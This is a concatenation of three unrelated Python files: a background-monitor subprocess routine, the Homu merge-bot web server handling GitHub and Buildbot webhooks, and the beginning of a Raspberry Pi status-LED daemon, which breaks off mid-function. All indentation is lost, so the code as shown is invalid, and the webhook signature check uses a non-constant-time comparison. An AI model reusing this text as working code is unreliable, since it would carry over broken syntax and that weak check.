def _background_process_start(cls, task_obj_id, event_start=None, parent_pid=None):
# type: (int, Optional[SafeEvent], Optional[int]) -> None
is_debugger_running = bool(getattr(sys, 'gettrace', None) and sys.gettrace())
# make sure we update the pid to our own
cls._main_process = os.getpid()
# restore the original signal handlers, this will prevent any deadlocks
# Do not change the exception handling: we need to catch the base exception as well
# noinspection PyBroadException
try:
from ... import Task
# make sure we do not call Task.current_task() it will create a Task object for us on a subprocess!
# noinspection PyProtectedMember
if Task._has_current_task_obj():
# noinspection PyProtectedMember
Task.current_task()._remove_at_exit_callbacks()
except: # noqa
pass
# if a debugger is running, wait for it to attach to the subprocess
if is_debugger_running:
sleep(3)
instances = BackgroundMonitor._instances.get(task_obj_id, [])
# launch all the threads
for d in instances:
d._start()
if cls._sub_process_started:
cls._sub_process_started.set()
if event_start:
event_start.set()
# wait until we are signaled
for i in instances:
# DO NOT CHANGE, we need to catch base exception, if the process gets killed
try:
while i._thread and i._thread.is_alive():
# noinspection PyBroadException
try:
p = psutil.Process(parent_pid)
parent_alive = p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
parent_alive = False
# if parent process is not here we should just leave!
if not parent_alive:
return
# DO NOT CHANGE, we need to catch base exception, if the process gets killed
try:
# timeout so we can detect if the parent process got killed.
i._thread.join(timeout=30.)
except: # noqa
break
except: # noqa
pass
# we are done, leave process
return
def is_alive(self):
if self.is_subprocess_mode():
return self.is_subprocess_alive() and self._thread \
and self._start_ev.is_set() and not self._done_ev.is_set()
else:
return isinstance(self._thread, Thread) and self._thread.is_alive()
@classmethod
def is_subprocess_alive(cls, task=None):
if not cls._main_process or (task and cls._main_process_task_id != task.id):
return False
# noinspection PyBroadException
try:
p = psutil.Process(cls._main_process)
return p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
current_pid = cls._main_process
if not current_pid:
return False
try:
parent = psutil.Process(cls._parent_pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
# look for our monitor subprocess among the parent's children
if child.pid == current_pid:
return child.is_running() and child.status() != psutil.STATUS_ZOMBIE
return False
def is_subprocess_mode(self):
return self._subprocess is not False and \
bool(self._main_process) and self._task_id == self._main_process_task_id
def _get_instances(self):
return self._instances.setdefault(self._task_obj_id, [])
def _is_subprocess_mode_and_not_parent_process(self):
return self.is_subprocess_mode() and self._parent_pid != os.getpid()
@classmethod
def is_subprocess_enabled(cls, task=None):
return bool(cls._main_process) and (not task or task.id == cls._main_process_task_id)
@classmethod
def clear_main_process(cls, task):
if BackgroundMonitor._main_process_task_id != task.id:
return
cls.wait_for_sub_process(task)
BackgroundMonitor._main_process = None
BackgroundMonitor._main_process_task_id = None
BackgroundMonitor._parent_pid = None
BackgroundMonitor._sub_process_started = None
BackgroundMonitor._instances = {}
SingletonThreadPool.clear()
@classmethod
def wait_for_sub_process(cls, task, timeout=None):
if not cls.is_subprocess_enabled(task=task):
return
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.stop()
tic = time()
while cls.is_subprocess_alive(task=task) and (not timeout or time()-tic < timeout):
sleep(0.03)
def leave_process(status=0):
# type: (int) -> None
"""
Exit current process with status-code (status)
:param status: int exit code
"""
try:
sys.exit(status or 0)
except: # noqa
# ipython/jupyter notebook will not allow calling sys.exit
# we have to call the low level function
os._exit(status or 0) # noqa
|
server.py
|
import hmac
import json
import urllib.parse
from .main import (
PullReqState,
parse_commands,
db_query,
INTERRUPTED_BY_HOMU_RE,
synchronize,
LabelEvent,
)
from . import comments
from . import utils
from .utils import lazy_debug
import github3
import jinja2
import requests
import pkg_resources
from bottle import (
get,
post,
run,
request,
redirect,
abort,
response,
)
from threading import Thread
import sys
import os
import traceback
from retrying import retry
import random
import string
import bottle
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024 * 10
class G:
pass
g = G()
ROLLUP_STR = {
-2: 'never',
-1: 'iffy',
0: '',
1: 'always',
}
def find_state(sha):
for repo_label, repo_states in g.states.items():
for state in repo_states.values():
if state.merge_sha == sha:
return state, repo_label
raise ValueError('Invalid SHA')
def get_repo(repo_label, repo_cfg):
repo = g.repos[repo_label].gh
if not repo:
repo = g.gh.repository(repo_cfg['owner'], repo_cfg['name'])
g.repos[repo_label].gh = repo
assert repo.owner.login == repo_cfg['owner']
assert repo.name == repo_cfg['name']
return repo
@get('/')
def index():
return g.tpls['index'].render(repos=[g.repos[label]
for label in sorted(g.repos)])
@get('/results/<repo_label:path>/<pull:int>')
def result(repo_label, pull):
if repo_label not in g.states:
abort(404, 'No such repository: {}'.format(repo_label))
states = [state for state in g.states[repo_label].values()
if state.num == pull]
if len(states) == 0:
abort(404, 'No build results for pull request {}'.format(pull))
state = states[0]
builders = []
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
for (builder, data) in state.build_res.items():
result = "pending"
if data['res'] is not None:
result = "success" if data['res'] else "failed"
builder_details = {
'result': result,
'name': builder,
}
if data['url']:
builder_details['url'] = data['url']
builders.append(builder_details)
return g.tpls['build_res'].render(repo_label=repo_label, repo_url=repo_url,
builders=builders, pull=pull)
@get('/queue/<repo_label:path>')
def queue(repo_label):
logger = g.logger.getChild('queue')
lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))
single_repo_closed = None
treeclosed_src = None
if repo_label == 'all':
labels = g.repos.keys()
multiple = True
repo_url = None
else:
labels = repo_label.split('+')
multiple = len(labels) > 1
if repo_label in g.repos and g.repos[repo_label].treeclosed >= 0:
single_repo_closed = g.repos[repo_label].treeclosed
treeclosed_src = g.repos[repo_label].treeclosed_src
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
states = []
for label in labels:
try:
states += g.states[label].values()
except KeyError:
abort(404, 'No such repository: {}'.format(label))
pull_states = sorted(states)
rows = []
for state in pull_states:
treeclosed = (single_repo_closed and
state.priority < g.repos[state.repo_label].treeclosed)
status_ext = ''
if state.try_:
status_ext += ' (try)'
rows.append({
'status': state.get_status(),
'status_ext': status_ext,
'priority': state.priority,
'rollup': ROLLUP_STR.get(state.rollup, ''),
'url': 'https://github.com/{}/{}/pull/{}'.format(state.owner,
state.name,
state.num),
'num': state.num,
'approved_by': state.approved_by,
'title': state.title,
'head_ref': state.head_ref,
'mergeable': ('yes' if state.mergeable is True else
'no' if state.mergeable is False else ''),
'assignee': state.assignee,
'repo_label': state.repo_label,
'repo_url': 'https://github.com/{}/{}'.format(state.owner,
state.name),
'greyed': "treeclosed" if treeclosed else "",
})
return g.tpls['queue'].render(
repo_url=repo_url,
repo_label=repo_label,
treeclosed=single_repo_closed,
treeclosed_src=treeclosed_src,
states=rows,
oauth_client_id=g.cfg['github']['app_client_id'],
total=len(pull_states),
approved=len([x for x in pull_states if x.approved_by]),
rolled_up=len([x for x in pull_states if x.rollup > 0]),
failed=len([x for x in pull_states if x.status == 'failure' or
x.status == 'error']),
multiple=multiple,
)
@get('/retry_log/<repo_label:path>')
def retry_log(repo_label):
logger = g.logger.getChild('retry_log')
lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'],
)
db_query(
g.db,
'''
SELECT num, time, src, msg FROM retry_log
WHERE repo = ? ORDER BY time DESC
''',
[repo_label],
)
logs = [
{'num': num, 'time': time, 'src': src, 'msg': msg}
for num, time, src, msg in g.db.fetchall()
]
return g.tpls['retry_log'].render(
repo_url=repo_url,
repo_label=repo_label,
logs=logs,
)
@get('/callback')
def callback():
logger = g.logger.getChild('callback')
response.content_type = 'text/plain'
code = request.query.code
state = json.loads(request.query.state)
lazy_debug(logger, lambda: 'state: {}'.format(state))
oauth_url = 'https://github.com/login/oauth/access_token'
try:
res = requests.post(oauth_url, data={
'client_id': g.cfg['github']['app_client_id'],
'client_secret': g.cfg['github']['app_client_secret'],
'code': code,
})
except Exception as ex:
logger.warn('/callback encountered an error '
'during github oauth callback')
# probably related to https://gitlab.com/pycqa/flake8/issues/42
lazy_debug(
logger,
lambda ex=ex: 'github oauth callback err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
args = urllib.parse.parse_qs(res.text)
token = args['access_token'][0]
repo_label = state['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
repo = get_repo(repo_label, repo_cfg)
user_gh = github3.login(token=token)
if state['cmd'] == 'rollup':
return rollup(user_gh, state, repo_label, repo_cfg, repo)
elif state['cmd'] == 'synch':
return synch(user_gh, state, repo_label, repo_cfg, repo)
else:
abort(400, 'Invalid command')
def rollup(user_gh, state, repo_label, repo_cfg, repo):
user_repo = user_gh.repository(user_gh.user().login, repo.name)
base_repo = user_gh.repository(repo.owner.login, repo.name)
nums = state.get('nums', [])
if nums:
try:
rollup_states = [g.states[repo_label][num] for num in nums]
except KeyError as e:
return 'Invalid PR number: {}'.format(e.args[0])
else:
rollup_states = [x for x in g.states[repo_label].values() if x.rollup]
rollup_states = [x for x in rollup_states if x.approved_by]
rollup_states.sort(key=lambda x: x.num)
if not rollup_states:
return 'No pull requests are marked as rollup'
base_ref = rollup_states[0].base_ref
base_sha = repo.ref('heads/' + base_ref).object.sha
branch_name = 'rollup-' + ''.join(
random.choice(string.digits + string.ascii_lowercase) for _ in range(7)
)
utils.github_set_ref(
user_repo,
'heads/' + branch_name,
base_sha,
force=True,
)
successes = []
failures = []
for state in rollup_states:
if base_ref != state.base_ref:
failures.append(state)
continue
merge_msg = 'Rollup merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
state.approved_by,
state.title,
state.body,
)
try:
user_repo.merge(branch_name, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
failures.append(state)
else:
successes.append(state)
title = 'Rollup of {} pull requests'.format(len(successes))
body = 'Successful merges:\n\n'
for x in successes:
body += ' - #{} ({})\n'.format(x.num, x.title)
body += '\nFailed merges:\n\n'
for x in failures:
body += ' - #{} ({})\n'.format(x.num, x.title)
body += '\nr? @ghost'
try:
pull = base_repo.create_pull(
title,
state.base_ref,
user_repo.owner.login + ':' + branch_name,
body,
)
except github3.models.GitHubError as e:
return e.response.text
else:
redirect(pull.html_url)
@post('/github')
def github():
logger = g.logger.getChild('github')
response.content_type = 'text/plain'
payload = request.body.read()
info = request.json
lazy_debug(logger, lambda: 'info: {}'.format(utils.remove_url_keys_from_json(info))) # noqa
owner_info = info['repository']['owner']
owner = owner_info.get('login') or owner_info['name']
repo_label = g.repo_labels[owner, info['repository']['name']]
repo_cfg = g.repo_cfgs[repo_label]
hmac_method, hmac_sig = request.headers['X-Hub-Signature'].split('=')
if hmac_sig != hmac.new(
repo_cfg['github']['secret'].encode('utf-8'),
payload,
hmac_method,
).hexdigest():
abort(400, 'Invalid signature')
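# For reference: GitHub computes the signature header as
#   'sha1=' + hmac.new(webhook_secret, raw_body, 'sha1').hexdigest()
# so hmac_method is normally 'sha1' and the comparison above must use the raw
# request body, not the parsed JSON.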
event_type = request.headers['X-Github-Event']
if event_type == 'pull_request_review_comment':
action = info['action']
original_commit_id = info['comment']['original_commit_id']
head_sha = info['pull_request']['head']['sha']
if action == 'created' and original_commit_id == head_sha:
pull_num = info['pull_request']['number']
body = info['comment']['body']
username = info['sender']['login']
user_id = info['sender']['id']
state = g.states[repo_label].get(pull_num)
if state:
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
if parse_commands(
body,
username,
user_id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
sha=original_commit_id,
command_src=info['comment']['html_url'],
):
state.save()
g.queue_handler()
elif event_type == 'pull_request':
action = info['action']
pull_num = info['number']
head_sha = info['pull_request']['head']['sha']
if action == 'synchronize':
state = g.states[repo_label][pull_num]
state.head_advanced(head_sha)
state.save()
elif action in ['opened', 'reopened']:
state = PullReqState(pull_num, head_sha, '', g.db, repo_label,
g.mergeable_que, g.gh,
info['repository']['owner']['login'],
info['repository']['name'],
repo_cfg.get('labels', {}),
g.repos,
repo_cfg.get('test-on-fork'))
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
state.head_ref = info['pull_request']['head']['repo']['owner']['login'] + ':' + info['pull_request']['head']['ref'] # noqa
state.base_ref = info['pull_request']['base']['ref']
state.set_mergeable(info['pull_request']['mergeable'])
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
found = False
if action == 'reopened':
# FIXME: Review comments are ignored here
for c in state.get_repo().issue(pull_num).iter_comments():
found = parse_commands(
c.body,
c.user.login,
c.user.id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
command_src=c.to_json()['html_url'],
# FIXME switch to `c.html_url`
# after updating github3 to 1.3.0+
) or found
status = ''
for info in utils.github_iter_statuses(state.get_repo(),
state.head_sha):
if info.context == 'homu':
status = info.state
break
state.set_status(status)
state.save()
g.states[repo_label][pull_num] = state
if found:
g.queue_handler()
elif action == 'closed':
state = g.states[repo_label][pull_num]
if hasattr(state, 'fake_merge_sha'):
def inner():
utils.github_set_ref(
state.get_repo(),
'heads/' + state.base_ref,
state.merge_sha,
force=True,
)
def fail(err):
state.add_comment(':boom: Failed to recover from the '
'artificial commit. See {} for details.'
' ({})'.format(state.fake_merge_sha,
err))
utils.retry_until(inner, fail, state)
del g.states[repo_label][pull_num]
db_query(g.db, 'DELETE FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, pull_num])
g.queue_handler()
elif action in ['assigned', 'unassigned']:
state = g.states[repo_label][pull_num]
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
state.save()
elif action == 'edited':
state = g.states[repo_label][pull_num]
base_ref = info['pull_request']['base']['ref']
if state.base_ref != base_ref:
state.base_ref = base_ref
state.set_mergeable(None)
# Remove PR approval when the base branch changes, to prevent the PR
# authors from merging the changes into other branches
if state.get_status() != '':
state.approved_by = ''
state.set_status('')
state.change_labels(LabelEvent.PUSHED)
state.add_comment(
':warning: The base branch changed to `{}`, and the '
'PR will need to be re-approved.\n\n'
'<!-- @{} r- -->'.format(base_ref, g.my_username)
)
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
state.save()
else:
lazy_debug(logger, lambda: 'Invalid pull_request action: {}'.format(action)) # noqa
elif event_type == 'push':
ref = info['ref'][len('refs/heads/'):]
for state in list(g.states[repo_label].values()):
if state.base_ref == ref:
state.set_mergeable(None, cause={
'sha': info['head_commit']['id'],
'title': info['head_commit']['message'].splitlines()[0],
})
if state.head_sha == info['before']:
if state.status:
state.change_labels(LabelEvent.PUSHED)
state.head_advanced(info['after'])
state.save()
elif event_type == 'issue_comment':
body = info['comment']['body']
username = info['comment']['user']['login']
user_id = info['comment']['user']['id']
pull_num = info['issue']['number']
state = g.states[repo_label].get(pull_num)
if 'pull_request' in info['issue'] and state:
state.title = info['issue']['title']
state.body = info['issue']['body']
if parse_commands(
body,
username,
user_id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
command_src=info['comment']['html_url'],
):
state.save()
g.queue_handler()
elif event_type == 'status':
try:
state, repo_label = find_state(info['sha'])
except ValueError:
return 'OK'
status_name = ""
if 'status' in repo_cfg:
for name, value in repo_cfg['status'].items():
if 'context' in value and value['context'] == info['context']:
status_name = name
if status_name == "":
return 'OK'
if info['state'] == 'pending':
return 'OK'
for row in info['branches']:
if row['name'] == state.base_ref:
return 'OK'
report_build_res(info['state'] == 'success', info['target_url'],
'status-' + status_name, state, logger, repo_cfg)
elif event_type == 'check_run':
try:
state, repo_label = find_state(info['check_run']['head_sha'])
except ValueError:
return 'OK'
current_run_name = info['check_run']['name']
checks_name = None
if 'checks' in repo_cfg:
for name, value in repo_cfg['checks'].items():
if state.try_ and 'try_name' in value:
if value['try_name'] == current_run_name:
checks_name = name
elif 'name' in value and value['name'] == current_run_name:
checks_name = name
if checks_name is None:
return 'OK'
if info['check_run']['status'] != 'completed':
return 'OK'
if info['check_run']['conclusion'] is None:
return 'OK'
        # GHA marks jobs as skipped if they are not run due to the job
        # condition. This prevents bors from failing because of these jobs.
if info['check_run']['conclusion'] == 'skipped':
return 'OK'
report_build_res(
info['check_run']['conclusion'] == 'success',
info['check_run']['details_url'],
'checks-' + checks_name,
state, logger, repo_cfg,
)
return 'OK'
def report_build_res(succ, url, builder, state, logger, repo_cfg):
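    # Record one builder's result for this PR. Once every builder has
    # reported success, the base branch is fast-forwarded to the merge
    # commit (or a try-build comment is posted); any failure marks the PR
    # as failed and updates its labels.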
lazy_debug(logger,
lambda: 'build result {}: builder = {}, succ = {}, current build_res = {}' # noqa
.format(state, builder, succ,
state.build_res_summary()))
state.set_build_res(builder, succ, url)
if succ:
if all(x['res'] for x in state.build_res.values()):
state.set_status('success')
utils.github_create_status(
state.get_repo(), state.head_sha,
'success', url, "Test successful", context='homu'
)
if state.approved_by and not state.try_:
state.add_comment(comments.BuildCompleted(
approved_by=state.approved_by,
base_ref=state.base_ref,
builders={k: v["url"] for k, v in state.build_res.items()},
merge_sha=state.merge_sha,
))
state.change_labels(LabelEvent.SUCCEED)
def set_ref():
utils.github_set_ref(state.get_repo(), 'heads/' +
state.base_ref, state.merge_sha)
if state.test_on_fork is not None:
utils.github_set_ref(state.get_test_on_fork_repo(),
'heads/' + state.base_ref,
state.merge_sha, force=True)
try:
try:
set_ref()
except github3.models.GitHubError:
utils.github_create_status(
state.get_repo(),
state.merge_sha,
'success', '',
'Branch protection bypassed',
context='homu')
set_ref()
state.fake_merge(repo_cfg)
except github3.models.GitHubError as e:
state.set_status('error')
desc = ('Test was successful, but fast-forwarding failed:'
' {}'.format(e))
utils.github_create_status(state.get_repo(),
state.head_sha, 'error', url,
desc, context='homu')
state.add_comment(':eyes: ' + desc)
else:
state.add_comment(comments.TryBuildCompleted(
builders={k: v["url"] for k, v in state.build_res.items()},
merge_sha=state.merge_sha,
))
state.change_labels(LabelEvent.TRY_SUCCEED)
else:
if state.status == 'pending':
state.set_status('failure')
utils.github_create_status(
state.get_repo(), state.head_sha,
'failure', url, "Test failed", context='homu'
)
if state.try_:
state.add_comment(comments.TryBuildFailed(
builder_url=url,
builder_name=builder,
))
state.change_labels(LabelEvent.TRY_FAILED)
else:
state.add_comment(comments.BuildFailed(
builder_url=url,
builder_name=builder,
))
state.change_labels(LabelEvent.FAILED)
g.queue_handler()
@post('/buildbot')
def buildbot():
logger = g.logger.getChild('buildbot')
response.content_type = 'text/plain'
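    # Buildbot posts batched events as a JSON `packets` form field; each
    # finished/started build is matched to a PR state by its revision
    # property and the outcome is fed into report_build_res.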
for row in json.loads(request.forms.packets):
if row['event'] == 'buildFinished':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if 'retry' in info['text']:
continue
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
lazy_debug(logger,
lambda: 'Invalid commit ID from Buildbot: {}'.format(props['revision'])) # noqa
continue
lazy_debug(logger, lambda: 'state: {}, {}'.format(state, state.build_res_summary())) # noqa
if info['builderName'] not in state.build_res:
lazy_debug(logger,
lambda: 'Invalid builder from Buildbot: {}'.format(info['builderName'])) # noqa
continue
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
build_succ = 'successful' in info['text'] or info['results'] == 0
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
if 'interrupted' in info['text']:
step_name = ''
for step in reversed(info['steps']):
if 'interrupted' in step.get('text', []):
step_name = step['name']
break
if step_name:
try:
url = ('{}/builders/{}/builds/{}/steps/{}/logs/interrupt' # noqa
).format(repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
step_name,)
res = requests.get(url)
except Exception as ex:
logger.warn('/buildbot encountered an error during '
'github logs request')
lazy_debug(
logger,
lambda ex=ex: 'buildbot logs err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
mat = INTERRUPTED_BY_HOMU_RE.search(res.text)
if mat:
interrupt_token = mat.group(1)
if getattr(state, 'interrupt_token',
'') != interrupt_token:
state.interrupt_token = interrupt_token
if state.status == 'pending':
state.set_status('')
desc = (':snowman: The build was interrupted '
'to prioritize another pull request.')
state.add_comment(desc)
state.change_labels(LabelEvent.INTERRUPTED)
utils.github_create_status(state.get_repo(),
state.head_sha,
'error', url,
desc,
context='homu')
g.queue_handler()
continue
else:
logger.error('Corrupt payload from Buildbot')
report_build_res(build_succ, url, info['builderName'],
state, logger, repo_cfg)
elif row['event'] == 'buildStarted':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
pass
else:
if info['builderName'] in state.build_res:
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
state.set_build_res(info['builderName'], None, url)
if g.buildbot_slots[0] == props['revision']:
g.buildbot_slots[0] = ''
g.queue_handler()
return 'OK'
@get('/assets/<file:path>')
def server_static(file):
current_path = os.path.dirname(__file__)
return bottle.static_file(file, root=os.path.join(current_path, 'assets'))
def synch(user_gh, state, repo_label, repo_cfg, repo):
try:
if not repo.is_collaborator(user_gh.user().login):
abort(400, 'You are not a collaborator')
except github3.GitHubError as e:
if e.code == 403:
abort(400, 'Homu does not have write access on the repository')
raise e
Thread(target=synchronize, args=[repo_label, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'Synchronizing {}...'.format(repo_label)
def synch_all():
@retry(wait_exponential_multiplier=1000, wait_exponential_max=600000)
def sync_repo(repo_label, g):
try:
synchronize(repo_label, g.repo_cfgs[repo_label], g.logger, g.gh,
g.states, g.repos, g.db, g.mergeable_que,
g.my_username, g.repo_labels)
except Exception:
print('* Error while synchronizing {}'.format(repo_label))
traceback.print_exc()
raise
for repo_label in g.repos:
sync_repo(repo_label, g)
print('* Done synchronizing all')
@post('/admin')
def admin():
if request.json['secret'] != g.cfg['web']['secret']:
return 'Authentication failure'
if request.json['cmd'] == 'repo_new':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
g.states[repo_label] = {}
g.repos[repo_label] = None
g.repo_cfgs[repo_label] = repo_cfg
g.repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
Thread(target=synchronize, args=[repo_label, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'OK'
elif request.json['cmd'] == 'repo_del':
repo_label = request.json['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
db_query(g.db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
del g.states[repo_label]
del g.repos[repo_label]
del g.repo_cfgs[repo_label]
del g.repo_labels[repo_cfg['owner'], repo_cfg['name']]
return 'OK'
elif request.json['cmd'] == 'repo_edit':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
assert repo_cfg['owner'] == g.repo_cfgs[repo_label]['owner']
assert repo_cfg['name'] == g.repo_cfgs[repo_label]['name']
g.repo_cfgs[repo_label] = repo_cfg
return 'OK'
elif request.json['cmd'] == 'sync_all':
Thread(target=synch_all).start()
return 'OK'
return 'Unrecognized command'
@get('/health')
def health():
return 'OK'
def redirect_to_canonical_host():
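    # Illustrative example (hypothetical config values): with
    # canonical_url = "https://bors.example.org" and
    # remove_path_prefixes = ["homu"], a request for
    # "http://old.example.org/homu/queue/rust" is 301-redirected to
    # "https://bors.example.org/queue/rust".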
request_url = urllib.parse.urlparse(request.url)
redirect_url = request_url
# Disable redirects on the health check endpoint.
if request_url.path == "/health":
return
# Handle hostname changes
if "canonical_url" in g.cfg["web"]:
canonical_url = urllib.parse.urlparse(g.cfg["web"]["canonical_url"])
redirect_url = redirect_url._replace(
scheme=canonical_url.scheme,
netloc=canonical_url.netloc,
)
# Handle path changes
for prefix in g.cfg["web"].get("remove_path_prefixes", []):
if redirect_url.path.startswith("/" + prefix + "/"):
new_path = redirect_url.path[len(prefix)+1:]
redirect_url = redirect_url._replace(path=new_path)
elif redirect_url.path == "/" + prefix:
redirect_url = redirect_url._replace(path="/")
if request_url != redirect_url:
redirect(urllib.parse.urlunparse(redirect_url), 301)
def start(cfg, states, queue_handler, repo_cfgs, repos, logger,
buildbot_slots, my_username, db, repo_labels, mergeable_que, gh):
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(pkg_resources.resource_filename(__name__, 'html')), # noqa
autoescape=True,
)
env.globals["announcement"] = cfg["web"].get("announcement")
tpls = {}
tpls['index'] = env.get_template('index.html')
tpls['queue'] = env.get_template('queue.html')
tpls['build_res'] = env.get_template('build_res.html')
tpls['retry_log'] = env.get_template('retry_log.html')
g.cfg = cfg
g.states = states
g.queue_handler = queue_handler
g.repo_cfgs = repo_cfgs
g.repos = repos
g.logger = logger.getChild('server')
g.buildbot_slots = buildbot_slots
g.tpls = tpls
g.my_username = my_username
g.db = db
g.repo_labels = repo_labels
g.mergeable_que = mergeable_que
g.gh = gh
bottle.app().add_hook("before_request", redirect_to_canonical_host)
# Synchronize all PR data on startup
if cfg['web'].get('sync_on_start', False):
Thread(target=synch_all).start()
try:
run(host=cfg['web'].get('host', '0.0.0.0'),
port=cfg['web']['port'],
server='waitress')
except OSError as e:
print(e, file=sys.stderr)
os._exit(1)
|
led.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Signal states on a LED'''
import itertools
import logging
import os
import threading
import time
import RPi.GPIO as GPIO
logger = logging.getLogger('led')
CONFIG_DIR = os.getenv('XDG_CONFIG_HOME') or os.path.expanduser('~/.config')
CONFIG_FILES = [
'/etc/status-led.ini',
os.path.join(CONFIG_DIR, 'status-led.ini')
]
class LED:
"""Starts a background thread to show patterns with the LED."""
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
def start(self):
self.pwm.start(0) # off by default
self.running = True
self.animator.start()
def stop(self):
self.running = False
self.animator.join()
self.pwm.stop()
GPIO.output(self.channel, GPIO.LOW)
def set_state(self, state):
self.state = state
def _animate(self):
# TODO(ensonic): refactor or add justification
# pylint: disable=too-many-branches
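        # Each named state maps either to a fixed duty cycle (on/off) or to
        # an itertools.cycle over duty-cycle values that is stepped every
        # `self.sleep` seconds.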
while self.running:
if self.state:
if self.state == 'on':
self.iterator = None
self.sleep = 0.0
self.pwm.ChangeDutyCycle(100)
elif self.state == 'off':
self.iterator = None
self.sleep = 0.0
self.pwm.ChangeDutyCycle(0)
elif self.state == 'blink':
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
elif self.state == 'blink-3':
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
elif self.state == 'beacon':
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
elif self.state == 'beacon-dark':
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
elif self.state == 'decay':
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
elif self.state == 'pulse-slow':
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
elif self.state == 'pulse-quick':
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
else:
logger.warning("unsupported state: %s", self.state)
self.state = None
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
time.sleep(1)
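# Minimal usage sketch for the LED class (the pin number is illustrative;
# main() below drives it from stdin instead):
#
#   GPIO.setmode(GPIO.BCM)
#   led = LED(25)
#   led.start()
#   led.set_state('blink')
#   time.sleep(5)
#   led.stop()
#   GPIO.cleanup()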
def main():
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
import configargparse
parser = configargparse.ArgParser(
default_config_files=CONFIG_FILES,
description="Status LED daemon")
parser.add_argument('-G', '--gpio-pin', default=25, type=int,
help='GPIO pin for the LED (default: 25)')
args = parser.parse_args()
led = None
state_map = {
"starting": "pulse-quick",
"ready": "beacon-dark",
"listening": "on",
"thinking": "pulse-quick",
"stopping": "pulse-quick",
"power-off": "off",
"error": "blink-3",
}
try:
GPIO.setmode(GPIO.BCM)
led = LED(args.gpio_pin)
led.start()
while True:
try:
state = input()
if not state:
continue
if state not in state_map:
logger.warning("unsupported state: %s, must be one of: %s",
state, ",".join(state_map.keys()))
continue
led.set_state(state_map[state])
